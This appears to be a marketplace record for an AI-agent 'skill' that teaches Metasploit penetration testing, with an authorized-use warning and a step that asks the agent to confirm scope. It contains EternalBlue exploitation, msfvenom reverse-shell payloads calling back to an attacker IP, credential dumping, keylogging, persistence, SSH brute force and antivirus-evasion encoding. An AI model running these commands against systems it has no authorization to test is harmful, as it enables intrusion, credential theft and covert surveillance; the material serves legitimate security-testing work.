[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-301f7292-8fa3-4a9b-958e-a88d72c39771":3,"$fGNDsD9O6rG2G2l3q-VEVC9q18yMNxZRmSicpI_JbnHI":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"301f7292-8fa3-4a9b-958e-a88d72c39771","metasploit-framework","⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.","cat_life_career","mod_other","sickn33,other","---\nname: metasploit-framework\ndescription: \"⚠️ AUTHORIZED USE ONLY > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n# Metasploit Framework\n\n> **⚠️ AUTHORIZED USE ONLY**\n> This skill is for educational purposes or authorized security assessments only.\n> You must have explicit, written permission from the system owner before using this tool.\n> Misuse of this tool is illegal and strictly prohibited.\n\n## Purpose\n\nLeverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.\n\n## Prerequisites\n\n### Required Tools\n```bash\n# Metasploit must already be installed before using this skill.\n# Kali Linux usually ships with it preinstalled.\nmsfconsole --version\n```\n\nInstallation varies by operating system and package source. Follow your platform's documented package-manager or vendor installation process before using this skill. 
Do not rely on an unpinned remote installer script from inside this skill.\n\nIf you want database-backed features such as workspace tracking, initialize `msfdb` using the instructions for your local installation. This skill assumes Metasploit is already available and does not require `sudo`, `systemctl`, or other privileged host-level setup steps.\n\n### Required Knowledge\n- Network and system fundamentals\n- Understanding of vulnerabilities and exploits\n- Basic programming concepts\n- Target enumeration techniques\n\n### Required Access\n- Written authorization for testing\n- Network access to target systems\n- Understanding of scope and rules of engagement\n\nBefore running exploit modules, ask the user to confirm the exact target host, scope, and authorization state.\n\n## Outputs and Deliverables\n\n1. **Exploitation Evidence** - Screenshots and logs of successful compromises\n2. **Session Logs** - Command history and extracted data\n3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references\n4. **Post-Exploitation Artifacts** - Credentials, files, and system information\n\n## Core Workflow\n\n### Phase 1: MSFConsole Basics\n\nLaunch and navigate the Metasploit console:\n\n```bash\n# Start msfconsole\nmsfconsole\n\n# Quiet mode (skip banner)\nmsfconsole -q\n\n# Basic navigation commands\nmsf6 > help                    # Show all commands\nmsf6 > search [term]           # Search modules\nmsf6 > use [module]            # Select module\nmsf6 > info                    # Show module details\nmsf6 > show options            # Display required options\nmsf6 > set [OPTION] [value]    # Configure option\nmsf6 > run \u002F exploit           # Execute module\nmsf6 > back                    # Return to main console\nmsf6 > exit                    # Exit msfconsole\n```\n\n### Phase 2: Module Types\n\nUnderstand the different module categories:\n\n```bash\n# 1. 
Exploit Modules - Target specific vulnerabilities\nmsf6 > show exploits\nmsf6 > use exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\n\n# 2. Payload Modules - Code executed after exploitation\nmsf6 > show payloads\nmsf6 > set PAYLOAD windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\n\n# 3. Auxiliary Modules - Scanning, fuzzing, enumeration\nmsf6 > show auxiliary\nmsf6 > use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_version\n\n# 4. Post-Exploitation Modules - Actions after compromise\nmsf6 > show post\nmsf6 > use post\u002Fwindows\u002Fgather\u002Fhashdump\n\n# 5. Encoders - Obfuscate payloads\nmsf6 > show encoders\nmsf6 > set ENCODER x86\u002Fshikata_ga_nai\n\n# 6. Nops - No-operation padding for buffer overflows\nmsf6 > show nops\n\n# 7. Evasion - Bypass security controls\nmsf6 > show evasion\n```\n\n### Phase 3: Searching for Modules\n\nFind appropriate modules for targets:\n\n```bash\n# Search by name\nmsf6 > search eternalblue\n\n# Search by CVE\nmsf6 > search cve:2017-0144\n\n# Search by platform\nmsf6 > search platform:windows type:exploit\n\n# Search by type and keyword\nmsf6 > search type:auxiliary smb\n\n# Filter by rank (excellent, great, good, normal, average, low, manual)\nmsf6 > search rank:excellent\n\n# Combined search\nmsf6 > search type:exploit platform:linux apache\n\n# View search results columns:\n# Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description\n```\n\n### Phase 4: Configuring Exploits\n\nSet up an exploit for execution:\n\n```bash\n# Select exploit module\nmsf6 > use exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\n\n# View required options\nmsf6 exploit(windows\u002Fsmb\u002Fms17_010_eternalblue) > show options\n\n# Set target host\nmsf6 exploit(...) > set RHOSTS 192.168.1.100\n\n# Set target port (if different from default)\nmsf6 exploit(...) > set RPORT 445\n\n# View compatible payloads\nmsf6 exploit(...) > show payloads\n\n# Set payload\nmsf6 exploit(...) 
> set PAYLOAD windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\n\n# Set local host for reverse connection\nmsf6 exploit(...) > set LHOST 192.168.1.50\nmsf6 exploit(...) > set LPORT 4444\n\n# View all options again to verify\nmsf6 exploit(...) > show options\n\n# Check if target is vulnerable (if supported)\nmsf6 exploit(...) > check\n\n# Execute exploit\nmsf6 exploit(...) > exploit\n# or\nmsf6 exploit(...) > run\n```\n\n### Phase 5: Payload Types\n\nSelect appropriate payload for the situation:\n\n```bash\n# Singles - Self-contained, no staging\nwindows\u002Fshell_reverse_tcp\nlinux\u002Fx86\u002Fshell_bind_tcp\n\n# Stagers - Small payload that downloads larger stage\nwindows\u002Fmeterpreter\u002Freverse_tcp\nlinux\u002Fx86\u002Fmeterpreter\u002Fbind_tcp\n\n# Stages - Downloaded by stager, provides full functionality\n# Meterpreter, VNC, shell\n\n# Payload naming convention:\n# [platform]\u002F[architecture]\u002F[payload_type]\u002F[connection_type]\n# Examples:\nwindows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\nlinux\u002Fx86\u002Fshell\u002Fbind_tcp\nphp\u002Fmeterpreter\u002Freverse_tcp\njava\u002Fmeterpreter\u002Freverse_https\nandroid\u002Fmeterpreter\u002Freverse_tcp\n```\n\n### Phase 6: Meterpreter Session\n\nWork with Meterpreter post-exploitation:\n\n```bash\n# After successful exploitation, you get Meterpreter prompt\nmeterpreter >\n\n# System Information\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getpid\n\n# File System Operations\nmeterpreter > pwd\nmeterpreter > ls\nmeterpreter > cd C:\\\\Users\nmeterpreter > download file.txt \u002Ftmp\u002F\nmeterpreter > upload \u002Ftmp\u002Ftool.exe C:\\\\\n\n# Process Management\nmeterpreter > ps\nmeterpreter > migrate [PID]\nmeterpreter > kill [PID]\n\n# Networking\nmeterpreter > ipconfig\nmeterpreter > netstat\nmeterpreter > route\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1\n\n# Privilege Escalation\nmeterpreter > getsystem\nmeterpreter > getprivs\n\n# Credential 
Harvesting\nmeterpreter > hashdump\nmeterpreter > run post\u002Fwindows\u002Fgather\u002Fcredentials\u002Fcredential_collector\n\n# Screenshots and Keylogging\nmeterpreter > screenshot\nmeterpreter > keyscan_start\nmeterpreter > keyscan_dump\nmeterpreter > keyscan_stop\n\n# Shell Access\nmeterpreter > shell\nC:\\Windows\\system32> whoami\nC:\\Windows\\system32> exit\nmeterpreter >\n\n# Background Session\nmeterpreter > background\nmsf6 exploit(...) > sessions -l\nmsf6 exploit(...) > sessions -i 1\n```\n\n### Phase 7: Auxiliary Modules\n\nUse auxiliary modules for reconnaissance:\n\n```bash\n# SMB Version Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_version\nmsf6 auxiliary(scanner\u002Fsmb\u002Fsmb_version) > set RHOSTS 192.168.1.0\u002F24\nmsf6 auxiliary(...) > run\n\n# Port Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fportscan\u002Ftcp\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > set PORTS 1-1000\nmsf6 auxiliary(...) > run\n\n# SSH Version Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fssh\u002Fssh_version\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.0\u002F24\nmsf6 auxiliary(...) > run\n\n# FTP Anonymous Login\nmsf6 > use auxiliary\u002Fscanner\u002Fftp\u002Fanonymous\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > run\n\n# HTTP Directory Scanner\nmsf6 > use auxiliary\u002Fscanner\u002Fhttp\u002Fdir_scanner\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > run\n\n# Brute Force Modules\nmsf6 > use auxiliary\u002Fscanner\u002Fssh\u002Fssh_login\nmsf6 auxiliary(...) > set RHOSTS 192.168.1.100\nmsf6 auxiliary(...) > set USER_FILE \u002Fusr\u002Fshare\u002Fwordlists\u002Fusers.txt\nmsf6 auxiliary(...) > set PASS_FILE \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt\nmsf6 auxiliary(...) 
> run\n```\n\n### Phase 8: Post-Exploitation Modules\n\nRun post modules on active sessions:\n\n```bash\n# List sessions\nmsf6 > sessions -l\n\n# Run post module on specific session\nmsf6 > use post\u002Fwindows\u002Fgather\u002Fhashdump\nmsf6 post(windows\u002Fgather\u002Fhashdump) > set SESSION 1\nmsf6 post(...) > run\n\n# Or run directly from Meterpreter\nmeterpreter > run post\u002Fwindows\u002Fgather\u002Fhashdump\n\n# Common Post Modules\n# Credential Gathering\npost\u002Fwindows\u002Fgather\u002Fcredentials\u002Fcredential_collector\npost\u002Fwindows\u002Fgather\u002Flsa_secrets\npost\u002Fwindows\u002Fgather\u002Fcachedump\npost\u002Fmulti\u002Fgather\u002Fssh_creds\n\n# System Enumeration\npost\u002Fwindows\u002Fgather\u002Fenum_applications\npost\u002Fwindows\u002Fgather\u002Fenum_logged_on_users\npost\u002Fwindows\u002Fgather\u002Fenum_shares\npost\u002Flinux\u002Fgather\u002Fenum_configs\n\n# Privilege Escalation\npost\u002Fwindows\u002Fescalate\u002Fgetsystem\npost\u002Fmulti\u002Frecon\u002Flocal_exploit_suggester\n\n# Persistence\npost\u002Fwindows\u002Fmanage\u002Fpersistence_exe\npost\u002Flinux\u002Fmanage\u002Fsshkey_persistence\n\n# Pivoting\npost\u002Fmulti\u002Fmanage\u002Fautoroute\n```\n\n### Phase 9: Payload Generation with msfvenom\n\nCreate standalone payloads:\n\n```bash\n# Basic Windows reverse shell\nmsfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe\n\n# Linux reverse shell\nmsfvenom -p linux\u002Fx86\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf\n\n# PHP reverse shell\nmsfvenom -p php\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php\n\n# Python reverse shell\nmsfvenom -p python\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py\n\n# PowerShell payload\nmsfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1\n\n# 
ASP web shell\nmsfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp\n\n# WAR file (Tomcat)\nmsfvenom -p java\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war\n\n# Android APK\nmsfvenom -p android\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk\n\n# Encoded payload (evade AV)\nmsfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86\u002Fshikata_ga_nai -i 5 -f exe -o encoded.exe\n\n# List available formats\nmsfvenom --list formats\n\n# List available encoders\nmsfvenom --list encoders\n```\n\n### Phase 10: Setting Up Handlers\n\nConfigure listener for incoming connections:\n\n```bash\n# Manual handler setup\nmsf6 > use exploit\u002Fmulti\u002Fhandler\nmsf6 exploit(multi\u002Fhandler) > set PAYLOAD windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\nmsf6 exploit(multi\u002Fhandler) > set LHOST 192.168.1.50\nmsf6 exploit(multi\u002Fhandler) > set LPORT 4444\nmsf6 exploit(multi\u002Fhandler) > exploit -j\n\n# The -j flag runs as background job\nmsf6 > jobs -l\n\n# When payload executes on target, session opens\n[*] Meterpreter session 1 opened\n\n# Interact with session\nmsf6 > sessions -i 1\n```\n\n## Quick Reference\n\n### Essential MSFConsole Commands\n\n| Command | Description |\n|---------|-------------|\n| `search [term]` | Search for modules |\n| `use [module]` | Select a module |\n| `info` | Display module information |\n| `show options` | Show configurable options |\n| `set [OPT] [val]` | Set option value |\n| `setg [OPT] [val]` | Set global option |\n| `run` \u002F `exploit` | Execute module |\n| `check` | Verify target vulnerability |\n| `back` | Deselect module |\n| `sessions -l` | List active sessions |\n| `sessions -i [N]` | Interact with session |\n| `jobs -l` | List background jobs |\n| `db_nmap` | Run nmap with database |\n\n### Meterpreter Essential Commands\n\n| Command | Description 
|\n|---------|-------------|\n| `sysinfo` | System information |\n| `getuid` | Current user |\n| `getsystem` | Attempt privilege escalation |\n| `hashdump` | Dump password hashes |\n| `shell` | Drop to system shell |\n| `upload\u002Fdownload` | File transfer |\n| `screenshot` | Capture screen |\n| `keyscan_start` | Start keylogger |\n| `migrate [PID]` | Move to another process |\n| `background` | Background session |\n| `portfwd` | Port forwarding |\n\n### Common Exploit Modules\n\n```bash\n# Windows\nexploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\nexploit\u002Fwindows\u002Fsmb\u002Fms08_067_netapi\nexploit\u002Fwindows\u002Fhttp\u002Fiis_webdav_upload_asp\nexploit\u002Fwindows\u002Flocal\u002Fbypassuac\n\n# Linux\nexploit\u002Flinux\u002Fssh\u002Fsshexec\nexploit\u002Flinux\u002Flocal\u002Foverlayfs_priv_esc\nexploit\u002Fmulti\u002Fhttp\u002Fapache_mod_cgi_bash_env_exec\n\n# Web Applications\nexploit\u002Fmulti\u002Fhttp\u002Ftomcat_mgr_upload\nexploit\u002Funix\u002Fwebapp\u002Fwp_admin_shell_upload\nexploit\u002Fmulti\u002Fhttp\u002Fjenkins_script_console\n```\n\n## Constraints and Limitations\n\n### Legal Requirements\n- Only use on systems you own or have written authorization to test\n- Document all testing activities\n- Follow rules of engagement\n- Report all findings to appropriate parties\n\n### Technical Limitations\n- Modern AV\u002FEDR may detect Metasploit payloads\n- Some exploits require specific target configurations\n- Firewall rules may block reverse connections\n- Not all exploits work on all target versions\n\n### Operational Security\n- Use encrypted channels (reverse_https) when possible\n- Clean up artifacts after testing\n- Avoid detection by monitoring systems\n- Limit post-exploitation to agreed scope\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |\n| Exploit fails\u002Fno session | Run `check`; verify payload 
architecture; check firewall; try different payloads |\n| Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript |\n| Payload detected by AV | Use encoding `-e x86\u002Fshikata_ga_nai -i 10`; use evasion modules; custom templates |\n\n## When to Use\nUse this skill to carry out the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,135,663,"2026-05-16 13:28:37",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"Other","other","mdi-page-next-outline","Other types of Skill",5,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"Career Development","career","mdi-briefcase-outline","Interview preparation, resume optimization, career planning",4,575,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"4e42cd59-edd7-4a1f-8db6-8aac4b6b0274","1.0.0","metasploit-framework.zip",4865,"uploads\u002Fskills\u002F301f7292-8fa3-4a9b-958e-a88d72c39771\u002Fmetasploit-framework.zip","c2f75a5b621640c75ea918e85eb14fd6653b53494ab6d0ae8f561c7342f8a68d","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":13933}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]